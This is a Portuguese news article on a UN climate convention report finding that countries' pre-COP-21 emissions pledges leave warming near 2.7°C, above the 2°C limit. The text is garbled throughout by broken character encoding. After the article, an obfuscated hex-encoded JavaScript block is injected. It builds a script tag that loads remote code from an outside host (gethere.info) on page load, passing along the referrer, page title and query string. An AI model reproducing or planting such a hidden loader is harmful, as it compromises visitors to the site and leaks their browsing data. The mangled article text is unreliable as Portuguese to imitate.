Home » Ciência » Natureza e Meio Ambiente » Promessas de paA�ses sA?o insuficientes para prevenir aquecimento mundial de 2A�C, alerta ONU

Promessas de paA�ses sA?o insuficientes para prevenir aquecimento mundial de 2A�C, alerta ONU

Em relatA?rio divulgado nesta sexta-feira (30) a organizaA�A?o afirma que o mundo estA? na direA�A?o certa, mas as metas deveriam passar por revisA�es periA?dicas para manter o globo em um patamar seguro de temperatura

Faltando um mA?s para o inA�cio da ConferA?ncia de Paris (COP-21), a ConvenA�A?o do Clima da OrganizaA�A?o das NaA�A�es Unidas (UNFCCC) divulgou na manhA? desta sexta-feira (30), em Berlim, um relatA?rio analisando as contribuiA�A�es que a maior parte dos paA�ses do mundo apresentou para reduzir o problema das mudanA�as climA?ticas. Em linhas gerais, buscou trazer uma mensagem positiva: se o mundo cumprir o que estA? prometendo vai conseguir evitar um futuro dramA?tico que seja de 4A�C a 5A�C mais quente. Mas tambA�m alertou: sA? que ainda estamos longe de ficar abaixo dos 2A�C – limite considerado seguro pelos cientistas.

A� a primeira vez que tantas naA�A�es se comprometem a tomar aA�A�es para reduzir suas emissA�es de gases de efeito estufa e, assim, tentar frear o aquecimento global. AtA� 1A? de outubro, 146 paA�ses (incluindo o Brasil) apresentaram suas ContribuiA�A�es Nacionalmente Determinadas (INDCs, na sigla em inglA?s), conjunto de compromissos com que cada um pretende contribuir pelos prA?ximos anos para evitar o problema. Juntos eles respondem por 86% das emissA�es de gases de efeito estufa do planeta. Todos os paA�ses desenvolvidos e os grandes emergentes, alA�m da maioria dos demais paA�ses em desenvolvimento, apresentaram suas metas.

De acordo com a anA?lise feita pela UNFCCC, considerando-se que todas as propostas sejam plenamente cumpridas, em 2030 o mundo poderA? ter deixado de emitir 4 gigatoneladas (Gt) de carbono na comparaA�A?o com o que emitiria sem as metas. Com essas aA�A�es, a mA�dia de emissA�es per capita tambA�m cairA? 9% atA� a data.

A anA?lise nA?o mediu o que isso significaria em termos de temperatura, mas, durante coletiva A� imprensa, a secretA?ria-executiva da convenA�A?o, Christiana Figueres, disse que a estimativa bate com outra, feita pela AgA?ncia Internacional de Energia (IEA), que chegou a nA?meros prA?ximos aos 4 Gt e, em seguida, extrapolou que o aumento da temperatura pode ficar em cerca de 2,7A�C atA� o final do sA�culo.

“A� muito boa notA�cia. Sem as INDCs estarA�amos no caminho de 4A�C ou 5A�C. Com elas plenamente cumpridas, ficamos abaixo dos 3A�C. A� uma boa notA�cia porque mostra que estamos na direA�A?o certa. Mas ficar abaixo de 3A�C A� diferente de ficar abaixo de 2A�C. A� um passo notA?vel, mas ainda nA?o A� suficiente”, alertou Christiana. No entendimento da convenA�A?o, as INDCs deixam as portas abertas para o mundo ficar no limite dos 2A�C.

COP 21 – Durante a ConferA?ncia do Clima que serA? realizada a partir de 30 de novembro em Paris, os paA�ses terA?o de estabelecer um acordo global de reduA�A?o das emissA�es. HA? dois pontos importantes que precisam ser decididos, segundo a ONU: como essas INDCs estarA?o ancoradas no acordo (hoje elas sA?o somente uma intenA�A?o) de um modo legal; e o que acontece depois disso.

Christiana defende uma revisA?o periA?dica, talvez a cada cinco anos, para aumentar os esforA�os a fim de que as emissA�es caiam ainda mais ao longo dos anos. “Estou confiante de que essas INDCs nA?o sA?o a A?ltima palavra sobre o que os paA�ses estA?o prontos para alcanA�ar ao longo do tempo. A jornada para um futuro climA?tico seguro estA? em andamento e o acordo em Paris pode catalisar essa transiA�A?o”, disse Christina.

AdvertA?ncia – Uma passada de olho sobre os nA?meros destrinchados pela UNFCCC mostra, porA�m, que, somando todas as metas, o salto para reduzir as emissA�es a ponto de evitar um aumento de temperatura maior serA? um grande desafio.

De acordo com os cA?lculos, em relaA�A?o a valores atuais, as emissA�es ainda sobem nos prA?ximos anos – apesar de menos do que subiriam se nA?o houvesse as INDCs. Para 2025, as emissA�es podem atingir 55,2 gigatoneladas de CO2 por ano e, em 2030, elas seriam de 56,7 Gt/ano. Em 2010, o mundo emitia cerca de 49 Gt anuais.

O IPCC (o painel de cientistas do clima da ONU) estima que para a temperatura nA?o subir alA�m dos 2A�C o mundo poderia emitir somente 1.000 Gt de CO2, entre 2011 e 2100. Considerando as INDCs, as emissA�es globais acumuladas chegarA?o a 748,2 Gt de CO2 em 2030 (num melhor cenA?rio seria 722,8 Gt). Ou seja, nas melhores condiA�A�es, sobrariam menos de 280 gigatoneladas para serem emitidas atA� o final do sA�culo.

“Para ficar nos 2A�C, considerando essa situaA�A?o, seria necessA?rio zerar as emissA�es a partir de 2050. Isso deixa menos de 14 gigatoneladas por ano entre 2031 e 2050. A� menos de um terA�o do que o mundo estarA? emitindo em 2030”, alerta Carlos Rittl, secretA?rio-executivo do ObservatA?rio do Clima, que atuou na revisA?o do relatA?rio. “EntA?o temos de olhar para esses nA?meros vendo, claro, que houve progresso, hA? um engajamento dos paA�ses, e atA� pode ser que eles cheguem a 2030 com um cenA?rio melhor do que as promessas que estA?o na mesa, mas todo mundo tem de fazer mais”, diz.

(Com EstadA?o ConteA?do)

var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Redação Brasil (m)

Login

Perdeu sua senha?